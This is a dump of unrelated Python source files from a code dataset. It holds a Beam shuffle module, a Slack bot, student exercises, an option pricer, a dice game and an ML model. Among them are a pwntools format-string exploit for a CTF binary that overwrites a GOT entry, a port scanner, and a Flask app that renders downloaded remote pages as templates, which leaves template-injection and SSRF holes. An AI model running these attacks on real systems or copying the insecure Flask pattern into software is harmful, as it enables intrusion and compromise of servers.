UngroupedShuffleReader(ShuffleReaderBase):\n \"\"\"A shuffle reader providing ungrouped reading.\"\"\"\n\n def __init__(self, shuffle_source, reader=None):\n super(UngroupedShuffleReader, self).__init__(shuffle_source, reader)\n\n def __iter__(self):\n for entry in self.entries_iterable:\n yield self.value_coder.decode(entry.value)\n\n\nclass ShuffleSourceBase(iobase.NativeSource):\n \"\"\"A base class for grouped and ungrouped shuffle sources.\"\"\"\n\n def __init__(self, config_bytes, coder, start_position='', end_position=''):\n self.config_bytes = config_bytes\n self.key_coder, self.value_coder = (\n coder if isinstance(coder, tuple) else (coder, coder))\n self.start_position = (start_position if not start_position\n else _shuffle_decode(start_position))\n self.end_position = (end_position if not end_position\n else _shuffle_decode(end_position))\n\n\nclass GroupedShuffleSource(ShuffleSourceBase):\n \"\"\"A source that reads from a shuffled dataset and yields key-grouped data.\n\n The value for each key will be an iterable object that will yield values.\n \"\"\"\n\n def reader(self, test_reader=None):\n return GroupedShuffleReader(self, reader=test_reader)\n\n\nclass UngroupedShuffleSource(ShuffleSourceBase):\n \"\"\"A source that reads from a shuffled dataset and yields values.\n\n This source will drop the keys of the key-value pairs and yield just the\n values. This source is used in resharding operations.\n \"\"\"\n\n def reader(self, test_reader=None):\n return UngroupedShuffleReader(self, reader=test_reader)\n\n\nclass ShuffleSinkWriter(iobase.NativeSinkWriter):\n \"\"\"A sink writer for ShuffleSink.\"\"\"\n\n def __init__(self, shuffle_sink, writer=None):\n self.sink = shuffle_sink\n self.writer = writer\n self.stream = StringIO.StringIO()\n self.bytes_buffered = 0\n self.key_coder = self.sink.key_coder.get_impl()\n self.value_coder = self.sink.value_coder.get_impl()\n\n def __enter__(self):\n if self.writer is None:\n self.writer = shuffle_client.PyShuffleWriter(\n _shuffle_decode(self.sink.config_bytes))\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n value = self.stream.getvalue()\n if value:\n self.writer.Write(value)\n self.bytes_buffered = 0\n self.stream.close()\n self.writer.Close()\n\n def Write(self, key, secondary_key, value):\n entry = ShuffleEntry(\n self.key_coder.encode(key),\n secondary_key,\n self.value_coder.encode(value),\n position=None)\n entry.to_bytes(self.stream, with_position=False)\n self.bytes_buffered += entry.size\n if self.bytes_buffered > 10 << 20:\n self.writer.Write(self.stream.getvalue())\n self.stream.close()\n self.stream = StringIO.StringIO()\n self.bytes_buffered = 0\n\n\nclass ShuffleSink(iobase.NativeSink):\n \"\"\"A sink that writes to a shuffled dataset.\"\"\"\n\n def __init__(self, config_bytes, coder):\n self.config_bytes = config_bytes\n self.key_coder, self.value_coder = (\n coder if isinstance(coder, tuple) else (coder, coder))\n\n def writer(self, test_writer=None):\n return ShuffleSinkWriter(self, writer=test_writer)\n","sub_path":"google/cloud/dataflow/worker/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":19072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"551656437","text":"\"\"\"\nChecks for failing test from api\n\"\"\"\n\nimport logging\nimport asyncio\nimport requests\nimport pendulum\n\n\ndef check_tests(\n loop, check_tests_delay, storage, slack_client, api_url, slack_message_template\n): # pylint: disable-msg=too-many-arguments\n \"\"\"\n Check tests and send slack message to user when some tracked tests failed\n \"\"\"\n logging.info(\"Check tests results\")\n loop.call_later(\n check_tests_delay, check_tests, loop, check_tests_delay, storage, slack_client, api_url, slack_message_template\n )\n end = pendulum.now(\"UTC\")\n start = pendulum.now(\"UTC\").substract(hours=24)\n response = requests.get(\n api_url,\n params={\"test_status\": \"failed\", \"start\": start.to_iso8601_string(), \"end\": end.to_iso8601_string()},\n headers={\"accept\": \"application/json\"},\n )\n storage[\"clean_expired_tracks\"]()\n tracks = storage[\"load_all_tracked_tests\"]()\n\n if \"tests\" not in response.json():\n logging.warning(\"Invalid JSON from api call. Does not contains tests field.\")\n return\n\n for test in response.json()[\"tests\"]:\n full_name = test[\"full_name\"]\n count = test[\"count\"]\n for track in tracks:\n if full_name != track[\"test\"]:\n continue\n asyncio.wait(send_track(track, count, check_tests_delay, slack_client, slack_message_template))\n\n\ndef send_track(track, count, check_tests_delay, client, slack_message_template):\n \"\"\"\n Send slack message\n \"\"\"\n logging.info(\"Sending message to client. USER: %s, TEST: %s FAILED\", track[\"user\"], track[\"test\"])\n slack_message = slack_message_template if slack_message_template is not None else \"\"\n slack_message = slack_message.replace(\"{{test}}\", track[\"test\"])\n slack_message = slack_message.replace(\"{{count}}\", str(count))\n slack_message = slack_message.replace(\n \"{{period}}\",\n pendulum.period(pendulum.now(\"UTC\").subtract(seconds=check_tests_delay), pendulum.now(\"UTC\")).in_words(),\n )\n return client.chat_postMessage(channel=track[\"channel_id\"], text=slack_message, thread_ts=track[\"thread_ts\"])\n","sub_path":"ebr_trackerbot/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"30248179","text":"i = input()\ni = i.split(' ')\nA = int(i[0])\nB = int(i[1])\nC = int(i[2])\nD = int(i[3])\nif((B > C) and (D > A) and \n ((C + D) > (A + B)) and \n (C > 0) and (D > 0) and\n (A % 2 == 0)):\n print(\"Valores aceitos\")\nelse:\n print(\"Valores nao aceitos\")\n","sub_path":"solutions/uri/1035.py","file_name":"1035.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382502942","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\ncounts=dict()\nwords=list()\nhandle = open(name)\nfor line in handle:\n if not line.startswith('From '): continue\n wor=line.split()\n wor=wor[5]\n wor=float(wor[0:2])\n words.append(wor)\n #print(words)\nfor word in words:\n counts[word]=counts.get(word,0)+1\n#print(sorted([(k,v) for k,v in counts.items()])) This will print as a Tuple\nlst=list()\nfor k,v in counts.items():\n tup=(k,v)\n lst.append(tup)\nlst.sort()\nfor k,v in lst:\n print(k,v)\n","sub_path":"Assignment10.2.py","file_name":"Assignment10.2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"221092510","text":"#!/usr/bin/python3\nimport hashlib\n\nimport urllib.request\nfrom flask import Flask, session, redirect, url_for, escape, request, render_template\nimport logging\nimport os\n\nm = hashlib.md5()\n\nbase_template_folder = \"./templates/\"\nbase_template_name = \"index.html\"\n\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\n\nheaders = {'User-Agent': user_agent, }\n\napp = Flask(__name__)\n\n# Set the secret key to some random bytes. Keep this really secret!\napp.secret_key = b'_5#32L\"F4Q8z\\n\\xec]/'\n\ndata = []\n@app.route('/')\ndef index():\n return redirect(url_for('informe_o_site'))\n\n\n@app.route('/informe_o_site', methods=['GET', 'POST'])\ndef informe_o_site():\n\n if request.method == 'POST':\n if request.form['urltounlock'] != \"\":\n session['urltounlock'] = request.form['urltounlock']\n if os.path.isfile(base_template_folder + base_template_name):\n print(\"File found, deleting\")\n os.remove(base_template_folder + base_template_name)\n return redirect(url_for('dothejob'))\n\n return '''\n
    \n

    Informe a URL do site\n

    \n

    \n

    \n '''\n\n\ndef download_site(download_url, save_as):\n if not os.path.isfile(save_as):\n assembled_request = urllib.request.Request(\n download_url, None, headers)\n response = urllib.request.urlopen(assembled_request)\n data = response.read()\n\n index_fd = open(save_as, \"w\")\n index_fd.write(data.decode(\"utf-8\"))\n index_fd.close()\n\n\n@app.route('/dothejob')\ndef dothejob():\n string_to_test = session['urltounlock'].encode(\"utf-8\")\n print(string_to_test)\n generated_id = hashlib.sha224(string_to_test).hexdigest()\n new_template_name = \"a\" + generated_id + base_template_name\n download_site(session['urltounlock'],\n base_template_folder + new_template_name)\n return render_template(new_template_name)\n\ndef main():\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"94678552","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 21 18:05:34 2017\r\n\r\n@author: SteveShaw\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef BTOption(opt_type,S0, K, r, u, T, N=2000,american=\"false\"):\r\n #we improve the previous tree by checking for early exercise for american options\r\n \r\n #calculate delta T \r\n deltaT = float(T) / N\r\n \r\n # up and down factor will be constant for the tree so we calculate outside the loop\r\n u = np.exp(0.3 * np.sqrt(deltaT))\r\n d = 1.0 / u\r\n \r\n #to work with vector we need to init the arrays using numpy\r\n fs = np.asarray([0.0 for i in range(N + 1)])\r\n \r\n #we need the stock tree for calculations of expiration values\r\n fs2 = np.asarray([(S0 * u**j * d**(N - j)) for j in range(N + 1)])\r\n \r\n #we vectorize the strikes as well so the expiration check will be faster\r\n fs3 =np.asarray( [float(K) for i in range(N + 1)])\r\n \r\n \r\n #rates are fixed so the probability of up and down are fixed.\r\n #this is used to make sure the drift is the risk free rate\r\n a = np.exp(r * deltaT)\r\n p = (a - d)/ (u - d)\r\n oneMinusP = 1.0 - p\r\n \r\n \r\n # Compute the leaves, f_{N, j}\r\n if opt_type ==\"C\":\r\n fs[:] = np.maximum(fs2-fs3, 0.0)\r\n else:\r\n fs[:] = np.maximum(-fs2+fs3, 0.0)\r\n \r\n \r\n #calculate backward the option prices\r\n for i in range(N-1, -1, -1):\r\n fs[:-1]=np.exp(-r * deltaT) * (p * fs[1:] + oneMinusP * fs[:-1])\r\n fs2[:]=fs2[:]*u\r\n \r\n if american=='true':\r\n #Simply check if the option is worth more alive or dead\r\n if type ==\"C\":\r\n fs[:]=np.maximum(fs[:],fs2[:]-fs3[:])\r\n else:\r\n fs[:]=np.maximum(fs[:],-fs2[:]+fs3[:])\r\n \r\n # print fs\r\n return fs[0]\r\n \r\nS0 = 100\r\nr=0.02\r\nsigma=0.3\r\nT=0.25\r\nN=15\r\nK = 110\r\n\r\nprc = BTOption('C', S0, K, r, sigma, T, N, 'true')\r\nprint(prc)","sub_path":"Financial_Eng/bin_tree.py","file_name":"bin_tree.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"376598265","text":"import random\n\nNUMBER_OF_DICE = 5\nSIDES = 6\n# The following constants can be used to describe the combination a player has.\nFIVE_OF_A_KIND = 7\nFOUR_OF_A_KIND = 6\nFULL_HOUSE = 5\nSTRAIGHT = 4\nTHREE_OF_A_KIND = 3\nTWO_PAIRS = 2\nPAIR = 1\nNOTHING = 0\nRESULTSTRINGS = [\"no special combination\", \"a pair\", \"two pairs\", \n \"three of a kind\", \"straight\", \"full house\", \n \"four of the kind\", \"five of the kind\"]\n\n\n# The function is used to initialize the random number generator.\n\ndef init_dice():\n seednumber = int(input(\"Enter a number to initialize the dice.\\n\"))\n random.seed(seednumber)\n \n \n# The function returns a random number from interval 1-6 to give a \n# result of one throw of a dice.\n \ndef roll_dice():\n return random.randint(1, SIDES)\n\n\n# The function rolls five dice and returns a list containing the figures of \n# the dice as integers.\n\ndef roll_all_dice():\n noppalista = []\n for i in range(NUMBER_OF_DICE):\n noppalista.append(roll_dice())\n return noppalista\n\n\n# The function checks whether the list given as a parameter\n# contains the same integer exactly 5 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_five_of_a_kind(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 5:\n return True\n return False\n\n\n# The function checks whether the list given as a parameter\n# contains the same integer exactly 4 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_four_of_a_kind(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 4:\n return True\n return False\n\n \n# The function checks whether the list given as a parameter\n# contains the same integer exactly 3 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_three_of_a_kind(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 3:\n return True\n return False\n\n\n# The function checks whether the list given as a parameter\n# contains the same integer exactly 2 times. The function returns True, \n# if this is the case, and otherwise False.\n\ndef has_pair(noppalista):\n for figure in range(1, SIDES + 1):\n if noppalista.count(figure) == 2:\n return True\n return False\n\ndef reroll(noppalista):\n print(\"Enter the numbers of the dice to be rerolled separated by a comma\")\n print(\"or an empty line if you do not want to reroll.\")\n mitka_nopat = input()\n if len(mitka_nopat) > 0:\n mitka_nopat1 = mitka_nopat.split(\",\")\n nopat_int = []\n for noppa in mitka_nopat1:\n noppa_lukuna = int(noppa)-1\n nopat_int.append(noppa_lukuna)\n toimiiko = acceptable(nopat_int)\n if toimiiko == True:\n for noppa in nopat_int:\n noppalista[noppa] = random.randint(1, SIDES)\n nopan_luku = noppa +1\n print(\"The new value for dice no {:d} is {:d}.\".format(nopan_luku, noppalista[noppa]))\n if toimiiko == False:\n print(\"The numbers you entered break the rules of the game.\") \n print(\"No dice are rerolled.\")\n return noppalista\ndef acceptable(numberlist):\n i = 0\n a = 0\n while i != len(numberlist):\n if 0 <= numberlist[i] <= 4:\n if i == 0:\n a += 1 \n else: \n erotus = numberlist[i] - numberlist[i-1]\n if erotus != 0:\n a += 1 \n i += 1\n if a == len(numberlist):\n return True\n else:\n return False\ndef has_straight(noppalista):\n q = noppalista[0]\n w = noppalista[1]\n e = noppalista[2]\n r = noppalista[3]\n t = noppalista[4]\n if has_five_of_a_kind(noppalista) == False and has_four_of_a_kind(noppalista) == False and has_three_of_a_kind(noppalista) == False and has_pair(noppalista) == False and q != 6 and w != 6 and e != 6 and r != 6 and t != 6:\n return True\n if has_five_of_a_kind(noppalista) == False and has_four_of_a_kind(noppalista) == False and has_three_of_a_kind(noppalista) == False and has_pair(noppalista) == False and q != 1 and w != 1 and e != 1 and r != 1 and t != 1:\n return True\n else:\n return False\ndef has_full_house(noppalista):\n order = sorted(noppalista)\n if order[0] == order[1] == order[2] and order[3] == order[4]:\n return True\n if order[0] == order[1] and order[2] == order[3] == order[4]:\n return True \n else:\n return False\ndef has_two_pairs(noppalista): \n order = sorted(noppalista)\n if order[0] == order[1] and order[2] == order[3]:\n return True\n if order[0] == order[1] and order[3] == order[4]:\n return True\n if order[1] == order[2] and order[3] == order[4]:\n return True\n else:\n return False \ndef check_combination(noppalista): \n if has_five_of_a_kind(noppalista):\n return 7\n if has_four_of_a_kind(noppalista):\n return 6\n if has_full_house(noppalista):\n return 5\n if has_straight(noppalista):\n return 4\n if has_three_of_a_kind(noppalista):\n return 3\n if has_two_pairs(noppalista):\n return 2\n if has_pair(noppalista):\n return 1\n else:\n return 0\ndef main(): \n init_dice() \n noppalista = roll_all_dice()\n print(\"Your turn:\")\n print(\"Your result is\",noppalista)\n \n noppalista = reroll(noppalista)\n \n koneen_tulos=roll_all_dice()\n print(\"Your final result is \",noppalista)\n print(\"The result of the computer is\", koneen_tulos)\n pelaaja = check_combination(noppalista)\n kone = check_combination(koneen_tulos)\n\n if pelaaja == 7:\n print(\"You have five of a kind.\")\n if pelaaja == 6:\n print(\"You have four of a kind.\")\n if pelaaja == 5:\n print(\"You have full house.\")\n if pelaaja == 4:\n print(\"You have straight.\")\n if pelaaja == 3:\n print(\"You have three of a kind.\")\n if pelaaja == 2:\n print(\"You have two pairs.\")\n if pelaaja == 1:\n print(\"You have a pair.\")\n if pelaaja == 0:\n print(\"You have no special combination.\") \n \n if kone == 7:\n print(\"Computer has five of a kind.\")\n if kone == 6:\n print(\"Computer has four of a kind.\")\n if kone == 5:\n print(\"Computer has full house.\")\n if kone == 4:\n print(\"Computer has straight.\")\n if kone == 3:\n print(\"Computer has three of a kind.\")\n if kone == 2:\n print(\"Computer has two pairs.\")\n if kone == 1:\n print(\"Computer has a pair.\")\n \n if kone == 0:\n print(\"Computer has nothing.\")\n \n if pelaaja > kone: \n print(\"You won.\")\n if pelaaja == kone:\n print(\"You tied with computer.\")\n if kone > pelaaja:\n print(\"Computer won.\")\nmain()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"dicepoker.py","file_name":"dicepoker.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"151675430","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 1 19:03:18 2018\n\n@author: ismael\n\"\"\"\n\nimport socket \n\nserver = 'www.hackthissite.org'\nrequest = \"GET / HTTP/1.1\\nHost: \"+server+\"\\n\\n\" # Define a requisição como HTML\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #cria socket tcp indicado em socket.SOCK_STREAM\ns.connect((server,80)) #Conecta ao server pela porta 80 (Porta de Acesso HTML)\ns.send(request.encode()) #envia a requisição\nresultado = s.recv(4096) # recebe resultado\nprint (resultado) # HTTP code 200\n\n############### Item b #########################\n\n\nportas = [20, 21, 22, 25, 53, 110, 443, 8080, 3306, 5001, 5002]\nvalida = True\n\nfor p in portas: \n \n try:\n conecta = s.connect((server,p))\n valida = True\n \n except: \n valida = False\n if valida:\n print(\"A porta {} está aberta, o serviço desta porta é {}\".format(p,socket.getservbyport(p[\"tcp\"])))\n print(\"A porta {} está aberta, o serviço desta porta é {}\".format(p,socket.getservbyport(p[\"udp\"])))\n \n","sub_path":"questao_1.py","file_name":"questao_1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"431066963","text":"from pwn import *\nfrom libformatstr import FormatStr\n\n\np = remote(\"problem1.tjctf.org\",8008)\n\n#p = process('./super_secrate')\nelf = ELF('./super_secrate')\nexit_got = elf.got[\"exit\"]\nget_secrate = elf.symbols[\"get_secret\"]\n\ninfo(\"Exit_got is : %x and get_secrate is %x\" , exit_got,get_secrate)\n\np.recvuntil(\"> \")\np.sendline('dredd')\np.recvuntil('> ')\n\n\nf = FormatStr()\nf[exit_got] = get_secrate\noffset = 35\nbuf = \"\"\nbuf += f.payload(offset,0)\np.sendline(buf)\np.recvuntil('> ')\np.sendline('dredd')\np.recv()\np.interactive()\np.wait()\n \n \n \n\n\n","sub_path":"tjctf/secure_secrets/super_secrate.py","file_name":"super_secrate.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"373878642","text":"#!/usr/bin/env python3\n\n\"\"\"Read Octopus Agile price data from an existing SQLite database and update a\n Pimoroni Blinkt! or Inky pHAT display if connected.\"\"\"\n\nfrom inky.eeprom import read_eeprom\nfrom blinkt_updater import update_blinkt\nfrom inky_updater import update_inky\n\nfind_inky = read_eeprom()\n\nif find_inky is None:\n print(\"No Inky found, trying Blinkt!\")\n update_blinkt()\nelse:\n print(\"Trying Inky\")\n update_inky()\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"365693169","text":"\"\"\"\nBinary search trees are a data structure that enforce an ordering over \nthe data they store. That ordering in turn makes it a lot more efficient \nat searching for a particular piece of data in the tree. \n\nThis part of the project comprises two days:\n1. Implement the methods `insert`, `contains`, `get_max`, and `for_each`\n on the BSTNode class.\n2. Implement the `in_order_print`, `bft_print`, and `dft_print` methods\n on the BSTNode class.\n\"\"\"\n\n\nclass Queue:\n def __init__(self):\n self.size = 0\n self.storage = []\n\n def __len__(self):\n return self.size\n\n def enqueue(self, value):\n self.size += 1\n self.storage.append(value)\n\n def dequeue(self):\n if self.size == 0:\n return None\n else:\n self.size -= 1\n return self.storage.pop(0)\n\n\nclass Stack:\n def __init__(self):\n self.size = 0\n self.storage = []\n\n def __len__(self):\n return self.size\n\n def push(self, value):\n self.storage.append(value)\n self.size += 1\n\n def pop(self):\n\n if self.size == 0:\n return None\n else:\n self.size -= 1\n return self.storage.pop()\n\n\n\n\nclass BSTNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n # Insert the given value into the tree\n def insert(self, value):\n if value < self.value:\n if self.left is None:\n self.left = BSTNode(value)\n else:\n self.left.insert(value)\n\n elif value >= self.value:\n if self.right is None:\n self.right = BSTNode(value)\n else:\n self.right.insert(value)\n\n # Return True if the tree contains the value\n # False if it does not\n def contains(self, target):\n if self.value == target:\n return True\n if target < self.value:\n if self.left is None:\n return False\n else:\n return self.left.contains(target)\n else:\n if self.right is None:\n return False\n else:\n return self.right.contains(target)\n\n\n\n # Return the maximum value found in the tree\n def get_max(self):\n current = self\n\n # loop down to find the rightmost leaf\n while current.right:\n return current.right.get_max()\n return current.value\n\n\n # Call the function `fn` on the value of each node\n def for_each(self, fn):\n fn(self.value)\n if self.left is not None:\n self.left.for_each(fn)\n if self.right is not None:\n self.right.for_each(fn)\n\n\n # Part 2 -----------------------\n\n # Print all the values in order from low to high\n # Hint: Use a recursive, depth first traversal\n def in_order_print(self, node=None):\n if self is None:\n return\n if self.left is not None:\n self.left.in_order_print()\n print(self.value)\n\n if self.right is not None:\n self.right.in_order_print()\n pass\n\n # Print the value of every node, starting with the given node,\n # in an iterative breadth first traversal\n def bft_print(self, node=None):\n # you should import the queue class from earlier in the week\n # and use that class to implement this method\n # Use a queue to form a \"line\"\n # for the nodes to \"get in\"\n queue = Queue()\n # start by placing the root in the queue\n queue.enqueue(self)\n # need a while loop to iterate\n # what are we checking in the while statement?\n # while length of queue is greater than 0\n while len(queue) > 0:\n # dequeue item from front of queue\n # print that item\n current = queue.dequeue()\n print(current.value)\n # place current item's left node in queue if not None\n if current.left is not None:\n queue.enqueue(current.left)\n # place current item's right node in queue if not None\n if current.right is not None:\n queue.enqueue(current.right)\n\n\n # Print the value of every node, starting with the given node,\n # in an iterative depth first traversal\n def dft_print(self, node=None):\n # initialize an empty stack\n empty_stack = Stack()\n # push the root node onto the stack\n empty_stack.push(self)\n # need a while loop to manager our iteration\n while len(empty_stack) > 0:\n\n # if stack is not empty enter the while loop\n\n # pop top item off the stack\n item = empty_stack.pop()\n # print that item's value\n print(item.value)\n\n\n # if there is a right subtree\n if item.right is not None:\n empty_stack.push(item.right)\n # push right item onto the stack\n if item.left is not None:\n empty_stack.push(item.left)\n # if there is a left subtree\n # push left item onto the stack\n\n\n\n # Stretch Goals -------------------------\n # Note: Research may be required\n\n # Print Pre-order recursive DFT\n def pre_order_dft(self, node):\n if node:\n print(node.value)\n\n self.pre_order_dft(node.left)\n self.pre_order_dft(node.right)\n\n\n # Print Post-order recursive DFT\n def post_order_dft(self, node):\n if node:\n self.post_order_dft(node.left)\n self.post_order_dft(node.right)\n\n\n print(node.value)\n\n\n\n\nbnt = BSTNode(20)\nbnt.insert(3)\nbnt.insert(3232)\nbnt.insert(4232)\nprint(bnt.get_max())\narr = []\ncb = lambda x: arr.append(x * 5)\nbnt.for_each(cb)\nprint(arr)\n\nbst = BSTNode(1)\nbst.insert(8)\nbst.insert(5)\nbst.insert(7)\nbst.insert(6)\nbst.insert(3)\nbst.insert(4)\nbst.insert(2)\nbst.post_order_dft(bst)\n\n","sub_path":"binary_search_tree/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112506302","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom src.model.module import (\n ConvModule, \n Res2NetStem, \n InversedDepthwiseSeparable, \n SEModule, \n DropChannel\n)\n\n##########\n# Basic layers\n##########\nclass OSBlock(nn.Module):\n \"\"\"\n Omni-scale feature learning block.\n x\n |\n Conv 1x1\n |\n | | | |\n InversedDepthwiseSeparable InversedDepthwiseSeparable InversedDepthwiseSeparable InversedDepthwiseSeparable\n InversedDepthwiseSeparable InversedDepthwiseSeparable InversedDepthwiseSeparable |\n InversedDepthwiseSeparable InversedDepthwiseSeparable | |\n InversedDepthwiseSeparable | | |\n | | | |\n \"\"\"\n \n def __init__(self, in_channels, out_channels, bottleneck_reduction=4):\n super(OSBlock, self).__init__()\n mid_channels = out_channels // bottleneck_reduction\n self.conv1 = ConvModule(\n in_channels,\n mid_channels,\n 1\n )\n self.conv2a = InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ) \n self.conv2b = nn.Sequential(\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n )\n )\n self.conv2c = nn.Sequential(\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n )\n )\n self.conv2d = nn.Sequential(\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n )\n )\n self.gate = SEModule(mid_channels)\n self.conv3 = ConvModule(\n mid_channels,\n out_channels,\n 1,\n activation=\"linear\")\n self.downsample = None\n if in_channels != out_channels:\n self.downsample = ConvModule(\n in_channels, \n out_channels,\n 1,\n activation=\"linear\")\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n residual = x\n x1 = self.conv1(x)\n x2a = self.conv2a(x1)\n x2b = self.conv2b(x1)\n x2c = self.conv2c(x1)\n x2d = self.conv2d(x1)\n x2 = self.gate(x2a) + self.gate(x2b) + self.gate(x2c) + self.gate(x2d)\n x3 = self.conv3(x2)\n if self.downsample is not None:\n residual = self.downsample(residual)\n out = self.relu(x3 + residual)\n return out\n\n\n##########\n# Network architecture\n##########\nclass OSNet(nn.Module):\n \"\"\"Omni-Scale Network.\n \n Reference:\n - Zhou et al. Omni-Scale Feature Learning for Person Re-Identification. ArXiv preprint, 2019.\n https://arxiv.org/abs/1905.00953\n \"\"\"\n\n def __init__(self, first_channel, stage_repeat, arch):\n super(OSNet, self).__init__()\n self.stem = Res2NetStem(3, first_channel) # output stride 4\n self.stages = nn.ModuleList()\n a_idx = 0\n for s_idx in range(len(stage_repeat)):\n stage = []\n for _ in range(stage_repeat[s_idx]):\n block, inc, ouc, s = arch[a_idx]\n a_idx += 1\n stage.append(self._make_layer(block, inc, ouc, s))\n print(stage) \n self.stages.append(nn.Sequential(*stage))\n self.last_channel = ouc\n self._init_params()\n\n def _make_layer(self, block, inc, ouc, s):\n if block == 'OSBlock':\n if s == 1:\n print(s)\n return OSBlock(inc, ouc)\n else:\n return nn.Sequential(\n ConvModule(inc, ouc, 1),\n nn.AvgPool2d(2, stride=2)\n )\n if block == 'ConvModule':\n return ConvModule(inc, ouc, 1)\n \n def _init_params(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.BatchNorm1d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x):\n x = self.stem(x)\n stage_feats = []\n for stage in self.stages:\n x = stage(x)\n stage_feats.append(x)\n return stage_feats\n \n##########\n# Instantiation\n##########\ndef osnet():\n return OSNet(\n first_channel=64,\n stage_repeat=[3, 3, 4],\n arch=[\n ('OSBlock', 64, 256, 1),\n ('OSBlock', 256, 256, 1),\n ('OSBlock', 256, 256, 2),\n ('OSBlock', 256, 384, 1),\n ('OSBlock', 384, 384, 1),\n ('OSBlock', 384, 384, 2),\n ('OSBlock', 384, 512, 1),\n ('OSBlock', 512, 512, 1),\n ('OSBlock', 512, 512, 1),\n ('ConvModule', 512, 512, 1)\n ]\n )\n","sub_path":"src/model/backbone/osnet.py","file_name":"osnet.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111779966","text":"# %%\nimport numpy as np\nimport pandas as pd\n\n # %%\ndata_frame = pd.DataFrame([[1, np.nan, 2],\n [2, 3, 5],\n [np.nan, 4, 6]])\n\n# %%\n#1) Use the function fill.na to fill the na values with 999\n\ne = data_frame.fillna(999)\n\n# %%\n\n#2) Turn the 999 values back to nas. See how many different ways you can do this\nd=np.where(e==999, np.nan, e)\nd\n\n# %%\n# put it in brackets and it will understand that this is what we're looking for\n#implicit masking\ndata_frame[data_frame == 999] = np.nan\ndata_frame\n# %%\ndata_frame9 = data_frame.fillna(999)\ndata_frame9[data_frame.isnull()] = np.nan\n# %%\ndata_frame9 = data_frame.fillna(999)\ndata_frame9 = data_frame9 +data_frame\ndata_frame9\n# %%\ndata_frame9 = data_frame.fillna(999) \ndata_frame9.replace(999, np.nan)\n# %%\n#%%\nimport os\nimport matplotlib.pyplot as plt\nplt.style.use('classic')\nimport numpy as np\n# %%\nx = np.linspace (0,10,100)\ny=np.sin(x)\n# %%\nplt.plot(x,y)\n# 